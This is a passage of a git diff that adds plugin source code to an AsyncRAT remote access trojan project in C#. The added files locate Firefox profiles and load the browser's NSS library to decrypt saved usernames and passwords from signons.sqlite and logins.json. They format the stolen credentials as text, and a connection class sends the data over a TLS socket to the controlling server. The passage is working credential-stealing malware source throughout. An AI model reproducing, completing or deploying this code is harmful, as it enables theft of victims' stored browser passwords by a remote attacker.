+ str = Environment.GetEnvironmentVariable("PROGRAMFILES") + "\\Mozilla Firefox\\";
+ }
+ FFDecryptor.LoadLibrary(str + "mozglue.dll");
+ FFDecryptor.NSS3 = FFDecryptor.LoadLibrary(str + "nss3.dll");
+ return ((FFDecryptor.DLLFunctionDelegate)Marshal.GetDelegateForFunctionPointer(FFDecryptor.GetProcAddress(FFDecryptor.NSS3, "NSS_Init"), typeof(FFDecryptor.DLLFunctionDelegate)))(configdir);
+ }
+
+ public static string Decrypt(string cypherText)
+ {
+ IntPtr ffDataUnmanagedPointer = IntPtr.Zero;
+ StringBuilder sb = new StringBuilder(cypherText);
+
+ try
+ {
+ byte[] ffData = Convert.FromBase64String(cypherText);
+
+ ffDataUnmanagedPointer = Marshal.AllocHGlobal(ffData.Length);
+ Marshal.Copy(ffData, 0, ffDataUnmanagedPointer, ffData.Length);
+
+ TSECItem tSecDec = new TSECItem();
+ TSECItem item = new TSECItem();
+ item.SECItemType = 0;
+ item.SECItemData = ffDataUnmanagedPointer;
+ item.SECItemLen = ffData.Length;
+
+ if (PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0)
+ {
+ if (tSecDec.SECItemLen != 0)
+ {
+ byte[] bvRet = new byte[tSecDec.SECItemLen];
+ Marshal.Copy(tSecDec.SECItemData, bvRet, 0, tSecDec.SECItemLen);
+ return Encoding.ASCII.GetString(bvRet);
+ }
+ }
+ }
+ catch
+ {
+ return null;
+ }
+ finally
+ {
+ if (ffDataUnmanagedPointer != IntPtr.Zero)
+ {
+ Marshal.FreeHGlobal(ffDataUnmanagedPointer);
+
+ }
+ }
+
+ return null;
+ }
+
+ [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
+ public delegate int DLLFunctionDelegate4(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen);
+ [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
+ public delegate int DLLFunctionDelegate5(ref TSECItem data, ref TSECItem result, int cx);
+ public static int PK11SDR_Decrypt(ref TSECItem data, ref TSECItem result, int cx)
+ {
+ IntPtr pProc = GetProcAddress(NSS3, "PK11SDR_Decrypt");
+ DLLFunctionDelegate5 dll = (DLLFunctionDelegate5)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate5));
+ return dll(ref data, ref result, cx);
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct TSECItem
+ {
+ public int SECItemType;
+ public IntPtr SECItemData;
+ public int SECItemLen;
+ }
+ }
+
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs
new file mode 100644
index 0000000..d14ba3e
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs
@@ -0,0 +1,74 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+//using Plugin.Browsers.Firefox.Cookies;
+
+namespace Plugin.Browsers.Firefox
+{
+ public class Firefox
+ {
+ public bool isOK = false;
+ //public void CookiesRecovery(StringBuilder Cooks)
+ //{
+ // try
+ // {
+ // List ffcs = Cookies.FFCookiesGrabber.Cookies();
+ // foreach (FFCookiesGrabber.FirefoxCookie fcc in ffcs)
+ // {
+ // if (!string.IsNullOrWhiteSpace(fcc.ToString()) && !isOK)
+ // {
+ // Cooks.Append("\n== Firefox ==========\n");
+ // isOK = true;
+ // }
+ // Cooks.Append(string.Concat(new string[]
+ // {
+ // fcc.ToString(),
+ // "\n\n",
+ // }));
+ // }
+ // Cooks.Append("\n");
+ // }
+ // catch
+ // {
+ // }
+ //}
+
+ public void CredRecovery(StringBuilder Pass)
+ {
+ try
+ {
+
+ foreach (IPassReader passReader in new List
+ {
+ new FirefoxPassReader()
+ })
+ {
+ foreach (CredentialModel credentialModel in passReader.ReadPasswords())
+ {
+ if (!string.IsNullOrWhiteSpace(credentialModel.Url) && !isOK)
+ {
+ Pass.Append("\n== Firefox ==========\n");
+ isOK = true;
+ }
+ Pass.Append(string.Concat(new string[]
+ {
+ credentialModel.Url,
+ "\nU: ",
+ credentialModel.Username,
+ "\nP: ",
+ credentialModel.Password,
+ "\n\n"
+ }));
+ }
+ }
+ }
+ catch
+ {
+ }
+
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/FirefoxPassReader.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/FirefoxPassReader.cs
new file mode 100644
index 0000000..0d73c15
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/FirefoxPassReader.cs
@@ -0,0 +1,129 @@
+using Newtonsoft.Json;
+using System;
+using System.Collections.Generic;
+using System.Data.SQLite;
+using System.IO;
+
+namespace Plugin.Browsers.Firefox
+{
+ class FirefoxPassReader : IPassReader
+ {
+ public string BrowserName { get { return "Firefox"; } }
+ public IEnumerable ReadPasswords()
+ {
+ string signonsFile = null;
+ string loginsFile = null;
+ bool signonsFound = false;
+ bool loginsFound = false;
+ string[] dirs = Directory.GetDirectories(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Mozilla\\Firefox\\Profiles"));
+
+ var logins = new List();
+ if (dirs.Length == 0)
+ return logins;
+
+ foreach (string dir in dirs)
+ {
+ string[] files = Directory.GetFiles(dir, "signons.sqlite");
+ if (files.Length > 0)
+ {
+ signonsFile = files[0];
+ signonsFound = true;
+ }
+
+ // find "logins.json"file
+ files = Directory.GetFiles(dir, "logins.json");
+ if (files.Length > 0)
+ {
+ loginsFile = files[0];
+ loginsFound = true;
+ }
+
+ if (loginsFound || signonsFound)
+ {
+ FFDecryptor.NSS_Init(dir);
+ break;
+ }
+
+ }
+
+ if (signonsFound)
+ {
+ using (var conn = new SQLiteConnection("Data Source=" + signonsFile + ";"))
+ {
+ conn.Open();
+ using (var command = conn.CreateCommand())
+ {
+ command.CommandText = "SELECT encryptedUsername, encryptedPassword, hostname FROM moz_logins";
+ using (var reader = command.ExecuteReader())
+ {
+ while (reader.Read())
+ {
+ string username = FFDecryptor.Decrypt(reader.GetString(0));
+ string password = FFDecryptor.Decrypt(reader.GetString(1));
+
+ logins.Add(new CredentialModel
+ {
+ Username = username,
+ Password = password,
+ Url = reader.GetString(2)
+ });
+ }
+ }
+ }
+ conn.Close();
+ }
+
+ }
+
+ if (loginsFound)
+ {
+ FFLogins ffLoginData;
+ using (StreamReader sr = new StreamReader(loginsFile))
+ {
+ string json = sr.ReadToEnd();
+ ffLoginData = JsonConvert.DeserializeObject(json);
+ }
+
+ foreach (LoginData loginData in ffLoginData.logins)
+ {
+ string username = FFDecryptor.Decrypt(loginData.encryptedUsername);
+ string password = FFDecryptor.Decrypt(loginData.encryptedPassword);
+ logins.Add(new CredentialModel
+ {
+ Username = username,
+ Password = password,
+ Url = loginData.hostname
+ });
+ }
+ }
+ return logins;
+ }
+
+ class FFLogins
+ {
+ public long nextId { get; set; }
+ public LoginData[] logins { get; set; }
+ public string[] disabledHosts { get; set; }
+ public int version { get; set; }
+ }
+
+ class LoginData
+ {
+ public long id { get; set; }
+ public string hostname { get; set; }
+ public string url { get; set; }
+ public string httprealm { get; set; }
+ public string formSubmitURL { get; set; }
+ public string usernameField { get; set; }
+ public string passwordField { get; set; }
+ public string encryptedUsername { get; set; }
+ public string encryptedPassword { get; set; }
+ public string guid { get; set; }
+ public int encType { get; set; }
+ public long timeCreated { get; set; }
+ public long timeLastUsed { get; set; }
+ public long timePasswordChanged { get; set; }
+ public long timesUsed { get; set; }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/IPassReader.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/IPassReader.cs
new file mode 100644
index 0000000..bbf1f2f
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/IPassReader.cs
@@ -0,0 +1,10 @@
+using System.Collections.Generic;
+
+namespace Plugin.Browsers
+{
+ interface IPassReader
+ {
+ IEnumerable ReadPasswords();
+ string BrowserName { get; }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/SQLiteHandler.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/SQLiteHandler.cs
new file mode 100644
index 0000000..039f4c4
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/SQLiteHandler.cs
@@ -0,0 +1,483 @@
+using System;
+using System.IO;
+using System.Text;
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.CompilerServices;
+
+namespace Plugin.Browsers
+{
+ public class SQLiteHandler
+ {
+ public SQLiteHandler(string baseName)
+ {
+ if (File.Exists(baseName))
+ {
+ FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
+ string s = Strings.Space((int)FileSystem.LOF(1));
+ FileSystem.FileGet(1, ref s, -1L, false);
+ FileSystem.FileClose(new int[]
+ {
+ 1
+ });
+ this.db_bytes = Encoding.Default.GetBytes(s);
+ if (Encoding.Default.GetString(this.db_bytes, 0, 15).CompareTo("SQLite format 3") != 0)
+ {
+ throw new Exception("Not a valid SQLite 3 Database File");
+ }
+ if (this.db_bytes[52] != 0)
+ {
+ throw new Exception("Auto-vacuum capable database is not supported");
+ }
+ this.page_size = (ushort)this.ConvertToInteger(16, 2);
+ this.encoding = this.ConvertToInteger(56, 4);
+ if (decimal.Compare(new decimal(this.encoding), 0m) == 0)
+ {
+ this.encoding = 1UL;
+ }
+ this.ReadMasterTable(100UL);
+ }
+ }
+
+ private ulong ConvertToInteger(int startIndex, int Size)
+ {
+ if (Size > 8 | Size == 0)
+ {
+ return 0UL;
+ }
+ ulong num = 0UL;
+ int num2 = Size - 1;
+ for (int i = 0; i <= num2; i++)
+ {
+ num = (num << 8 | (ulong)this.db_bytes[startIndex + i]);
+ }
+ return num;
+ }
+
+ private long CVL(int startIndex, int endIndex)
+ {
+ endIndex++;
+ byte[] array = new byte[8];
+ int num = endIndex - startIndex;
+ bool flag = false;
+ if (num == 0 | num > 9)
+ {
+ return 0L;
+ }
+ if (num == 1)
+ {
+ array[0] = (byte)(this.db_bytes[startIndex] & 127);
+ return BitConverter.ToInt64(array, 0);
+ }
+ if (num == 9)
+ {
+ flag = true;
+ }
+ int num2 = 1;
+ int num3 = 7;
+ int num4 = 0;
+ if (flag)
+ {
+ array[0] = this.db_bytes[endIndex - 1];
+ endIndex--;
+ num4 = 1;
+ }
+ for (int i = endIndex - 1; i >= startIndex; i += -1)
+ {
+ if (i - 1 >= startIndex)
+ {
+ array[num4] = (byte)(((int)((byte)(this.db_bytes[i] >> (num2 - 1 & 7))) & 255 >> num2) | (int)((byte)(this.db_bytes[i - 1] << (num3 & 7))));
+ num2++;
+ num4++;
+ num3--;
+ }
+ else if (!flag)
+ {
+ array[num4] = (byte)((int)((byte)(this.db_bytes[i] >> (num2 - 1 & 7))) & 255 >> num2);
+ }
+ }
+ return BitConverter.ToInt64(array, 0);
+ }
+
+ public int GetRowCount()
+ {
+ return this.table_entries.Length;
+ }
+
+ public string[] GetTableNames()
+ {
+ string[] array = null;
+ int num = 0;
+ int num2 = this.master_table_entries.Length - 1;
+ for (int i = 0; i <= num2; i++)
+ {
+ if (this.master_table_entries[i].item_type == "table")
+ {
+ array = (string[])Utils.CopyArray(array, new string[num + 1]);
+ array[num] = this.master_table_entries[i].item_name;
+ num++;
+ }
+ }
+ return array;
+ }
+
+ public string GetValue(int row_num, int field)
+ {
+ if (row_num >= this.table_entries.Length)
+ {
+ return null;
+ }
+ if (field >= this.table_entries[row_num].content.Length)
+ {
+ return null;
+ }
+ return this.table_entries[row_num].content[field];
+ }
+
+ public string GetValue(int row_num, string field)
+ {
+ int num = -1;
+ int num2 = this.field_names.Length - 1;
+ for (int i = 0; i <= num2; i++)
+ {
+ if (this.field_names[i].ToLower().CompareTo(field.ToLower()) == 0)
+ {
+ num = i;
+ break;
+ }
+ }
+ if (num == -1)
+ {
+ return null;
+ }
+ return this.GetValue(row_num, num);
+ }
+
+ private int GVL(int startIndex)
+ {
+ if (startIndex > this.db_bytes.Length)
+ {
+ return 0;
+ }
+ int num = startIndex + 8;
+ for (int i = startIndex; i <= num; i++)
+ {
+ if (i > this.db_bytes.Length - 1)
+ {
+ return 0;
+ }
+ if ((this.db_bytes[i] & 128) != 128)
+ {
+ return i;
+ }
+ }
+ return startIndex + 8;
+ }
+
+ private bool IsOdd(long value)
+ {
+ return (value & 1L) == 1L;
+ }
+
+ private void ReadMasterTable(ulong Offset)
+ {
+ if (this.db_bytes[(int)Offset] == 13)
+ {
+ ushort num = Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3m)), 2)), 1m));
+ int num2 = 0;
+ if (this.master_table_entries != null)
+ {
+ num2 = this.master_table_entries.Length;
+ this.master_table_entries = (SQLiteHandler.sqlite_master_entry[])Utils.CopyArray(this.master_table_entries, new SQLiteHandler.sqlite_master_entry[this.master_table_entries.Length + (int)num + 1]);
+ }
+ else
+ {
+ this.master_table_entries = new SQLiteHandler.sqlite_master_entry[(int)(num + 1)];
+ }
+ int num3 = (int)num;
+ for (int i = 0; i <= num3; i++)
+ {
+ ulong num4 = this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8m), new decimal(i * 2))), 2);
+ if (decimal.Compare(new decimal(Offset), 100m) != 0)
+ {
+ num4 += Offset;
+ }
+ int num5 = this.GVL((int)num4);
+ this.CVL((int)num4, num5);
+ int num6 = this.GVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), decimal.Subtract(new decimal(num5), new decimal(num4))), 1m)));
+ this.master_table_entries[num2 + i].row_id = this.CVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), decimal.Subtract(new decimal(num5), new decimal(num4))), 1m)), num6);
+ num4 = Convert.ToUInt64(decimal.Add(decimal.Add(new decimal(num4), decimal.Subtract(new decimal(num6), new decimal(num4))), 1m));
+ num5 = this.GVL((int)num4);
+ num6 = num5;
+ long value = this.CVL((int)num4, num5);
+ long[] array = new long[5];
+ int num7 = 0;
+ do
+ {
+ num5 = num6 + 1;
+ num6 = this.GVL(num5);
+ array[num7] = this.CVL(num5, num6);
+ if (array[num7] > 9L)
+ {
+ if (this.IsOdd(array[num7]))
+ {
+ array[num7] = (long)Math.Round((double)(array[num7] - 13L) / 2.0);
+ }
+ else
+ {
+ array[num7] = (long)Math.Round((double)(array[num7] - 12L) / 2.0);
+ }
+ }
+ else
+ {
+ array[num7] = (long)((ulong)this.SQLDataTypeSize[(int)array[num7]]);
+ }
+ num7++;
+ }
+ while (num7 <= 4);
+ if (decimal.Compare(new decimal(this.encoding), 1m) == 0)
+ {
+ this.master_table_entries[num2 + i].item_type = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num4), new decimal(value))), (int)array[0]);
+ }
+ else if (decimal.Compare(new decimal(this.encoding), 2m) == 0)
+ {
+ this.master_table_entries[num2 + i].item_type = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num4), new decimal(value))), (int)array[0]);
+ }
+ else if (decimal.Compare(new decimal(this.encoding), 3m) == 0)
+ {
+ this.master_table_entries[num2 + i].item_type = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num4), new decimal(value))), (int)array[0]);
+ }
+ if (decimal.Compare(new decimal(this.encoding), 1m) == 0)
+ {
+ this.master_table_entries[num2 + i].item_name = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), new decimal(value)), new decimal(array[0]))), (int)array[1]);
+ }
+ else if (decimal.Compare(new decimal(this.encoding), 2m) == 0)
+ {
+ this.master_table_entries[num2 + i].item_name = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), new decimal(value)), new decimal(array[0]))), (int)array[1]);
+ }
+ else if (decimal.Compare(new decimal(this.encoding), 3m) == 0)
+ {
+ this.master_table_entries[num2 + i].item_name = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), new decimal(value)), new decimal(array[0]))), (int)array[1]);
+ }
+ this.master_table_entries[num2 + i].root_num = (long)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num4), new decimal(value)), new decimal(array[0])), new decimal(array[1])), new decimal(array[2]))), (int)array[3]);
+ if (decimal.Compare(new decimal(this.encoding), 1m) == 0)
+ {
+ this.master_table_entries[num2 + i].sql_statement = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num4), new decimal(value)), new decimal(array[0])), new decimal(array[1])), new decimal(array[2])), new decimal(array[3]))), (int)array[4]);
+ }
+ else if (decimal.Compare(new decimal(this.encoding), 2m) == 0)
+ {
+ this.master_table_entries[num2 + i].sql_statement = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num4), new decimal(value)), new decimal(array[0])), new decimal(array[1])), new decimal(array[2])), new decimal(array[3]))), (int)array[4]);
+ }
+ else if (decimal.Compare(new decimal(this.encoding), 3m) == 0)
+ {
+ this.master_table_entries[num2 + i].sql_statement = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num4), new decimal(value)), new decimal(array[0])), new decimal(array[1])), new decimal(array[2])), new decimal(array[3]))), (int)array[4]);
+ }
+ }
+ return;
+ }
+ if (this.db_bytes[(int)Offset] == 5)
+ {
+ int num8 = (int)Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3m)), 2)), 1m));
+ for (int j = 0; j <= num8; j++)
+ {
+ ushort num9 = (ushort)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12m), new decimal(j * 2))), 2);
+ if (decimal.Compare(new decimal(Offset), 100m) == 0)
+ {
+ this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger((int)num9, 4)), 1m), new decimal((int)this.page_size))));
+ }
+ else
+ {
+ this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger((int)(Offset + (ulong)num9), 4)), 1m), new decimal((int)this.page_size))));
+ }
+ }
+ this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8m)), 4)), 1m), new decimal((int)this.page_size))));
+ }
+ }
+
+ public bool ReadTable(string TableName)
+ {
+ int num = -1;
+ int num2 = this.master_table_entries.Length - 1;
+ for (int i = 0; i <= num2; i++)
+ {
+ if (this.master_table_entries[i].item_name.ToLower().CompareTo(TableName.ToLower()) == 0)
+ {
+ num = i;
+ break;
+ }
+ }
+ if (num == -1)
+ {
+ return false;
+ }
+ string[] array = this.master_table_entries[num].sql_statement.Substring(this.master_table_entries[num].sql_statement.IndexOf("(") + 1).Split(new char[]
+ {
+ ','
+ });
+ int num3 = array.Length - 1;
+ for (int j = 0; j <= num3; j++)
+ {
+ array[j] = array[j].TrimStart(new char[0]);
+ int num4 = array[j].IndexOf(" ");
+ if (num4 > 0)
+ {
+ array[j] = array[j].Substring(0, num4);
+ }
+ if (array[j].IndexOf("UNIQUE") == 0)
+ {
+ break;
+ }
+ this.field_names = (string[])Utils.CopyArray(this.field_names, new string[j + 1]);
+ this.field_names[j] = array[j];
+ }
+ return this.ReadTableFromOffset((ulong)((this.master_table_entries[num].root_num - 1L) * (long)((ulong)this.page_size)));
+ }
+
+ private bool ReadTableFromOffset(ulong Offset)
+ {
+ if (this.db_bytes[(int)Offset] == 13)
+ {
+ int num = Convert.ToInt32(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3m)), 2)), 1m));
+ int num2 = 0;
+ if (this.table_entries != null)
+ {
+ num2 = this.table_entries.Length;
+ this.table_entries = (SQLiteHandler.table_entry[])Utils.CopyArray(this.table_entries, new SQLiteHandler.table_entry[this.table_entries.Length + num + 1]);
+ }
+ else
+ {
+ this.table_entries = new SQLiteHandler.table_entry[num + 1];
+ }
+ int num3 = num;
+ for (int i = 0; i <= num3; i++)
+ {
+ SQLiteHandler.record_header_field[] array = null;
+ ulong num4 = this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8m), new decimal(i * 2))), 2);
+ if (decimal.Compare(new decimal(Offset), 100m) != 0)
+ {
+ num4 += Offset;
+ }
+ int num5 = this.GVL((int)num4);
+ this.CVL((int)num4, num5);
+ int num6 = this.GVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), decimal.Subtract(new decimal(num5), new decimal(num4))), 1m)));
+ this.table_entries[num2 + i].row_id = this.CVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), decimal.Subtract(new decimal(num5), new decimal(num4))), 1m)), num6);
+ num4 = Convert.ToUInt64(decimal.Add(decimal.Add(new decimal(num4), decimal.Subtract(new decimal(num6), new decimal(num4))), 1m));
+ num5 = this.GVL((int)num4);
+ num6 = num5;
+ long num7 = this.CVL((int)num4, num5);
+ long num8 = Convert.ToInt64(decimal.Add(decimal.Subtract(new decimal(num4), new decimal(num5)), 1m));
+ int num9 = 0;
+ while (num8 < num7)
+ {
+ array = (SQLiteHandler.record_header_field[])Utils.CopyArray(array, new SQLiteHandler.record_header_field[num9 + 1]);
+ num5 = num6 + 1;
+ num6 = this.GVL(num5);
+ array[num9].type = this.CVL(num5, num6);
+ if (array[num9].type > 9L)
+ {
+ if (this.IsOdd(array[num9].type))
+ {
+ array[num9].size = (long)Math.Round((double)(array[num9].type - 13L) / 2.0);
+ }
+ else
+ {
+ array[num9].size = (long)Math.Round((double)(array[num9].type - 12L) / 2.0);
+ }
+ }
+ else
+ {
+ array[num9].size = (long)((ulong)this.SQLDataTypeSize[(int)array[num9].type]);
+ }
+ num8 = num8 + (long)(num6 - num5) + 1L;
+ num9++;
+ }
+ this.table_entries[num2 + i].content = new string[array.Length - 1 + 1];
+ int num10 = 0;
+ int num11 = array.Length - 1;
+ for (int j = 0; j <= num11; j++)
+ {
+ if (array[j].type > 9L)
+ {
+ if (!this.IsOdd(array[j].type))
+ {
+ if (decimal.Compare(new decimal(this.encoding), 1m) == 0)
+ {
+ this.table_entries[num2 + i].content[j] = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), new decimal(num7)), new decimal(num10))), (int)array[j].size);
+ }
+ else if (decimal.Compare(new decimal(this.encoding), 2m) == 0)
+ {
+ this.table_entries[num2 + i].content[j] = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), new decimal(num7)), new decimal(num10))), (int)array[j].size);
+ }
+ else if (decimal.Compare(new decimal(this.encoding), 3m) == 0)
+ {
+ this.table_entries[num2 + i].content[j] = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), new decimal(num7)), new decimal(num10))), (int)array[j].size);
+ }
+ }
+ else
+ {
+ this.table_entries[num2 + i].content[j] = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), new decimal(num7)), new decimal(num10))), (int)array[j].size);
+ }
+ }
+ else
+ {
+ this.table_entries[num2 + i].content[j] = Conversions.ToString(this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num4), new decimal(num7)), new decimal(num10))), (int)array[j].size));
+ }
+ num10 += (int)array[j].size;
+ }
+ }
+ }
+ else if (this.db_bytes[(int)Offset] == 5)
+ {
+ int num12 = (int)Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3m)), 2)), 1m));
+ for (int k = 0; k <= num12; k++)
+ {
+ ushort num13 = (ushort)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12m), new decimal(k * 2))), 2);
+ this.ReadTableFromOffset(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger((int)(Offset + (ulong)num13), 4)), 1m), new decimal((int)this.page_size))));
+ }
+ this.ReadTableFromOffset(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8m)), 4)), 1m), new decimal((int)this.page_size))));
+ }
+ return true;
+ }
+
+ private byte[] db_bytes;
+ private ulong encoding;
+ private string[] field_names;
+ private SQLiteHandler.sqlite_master_entry[] master_table_entries;
+ private ushort page_size;
+ private byte[] SQLDataTypeSize = new byte[]
+ {
+ 0,
+ 1,
+ 2,
+ 3,
+ 4,
+ 6,
+ 8,
+ 8,
+ 0,
+ 0
+ };
+
+ private SQLiteHandler.table_entry[] table_entries;
+
+ private struct record_header_field
+ {
+ public long size;
+ public long type;
+ }
+
+ private struct sqlite_master_entry
+ {
+ public long row_id;
+ public string item_type;
+ public string item_name;
+ public long root_num;
+ public string sql_statement;
+ }
+
+ private struct table_entry
+ {
+ public long row_id;
+ public string[] content;
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Connection.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Connection.cs
new file mode 100644
index 0000000..558ba67
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Connection.cs
@@ -0,0 +1,143 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient(byte[] packet)
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+
+ new Thread(() =>
+ {
+ Packet.Read();
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ GC.Collect();
+ }
+ catch { }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/FodyWeavers.xml b/AsyncRAT-C#/Plugin/Recovery/Recovery/FodyWeavers.xml
new file mode 100644
index 0000000..5029e70
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/FodyWeavers.xml
@@ -0,0 +1,3 @@
+
+
+
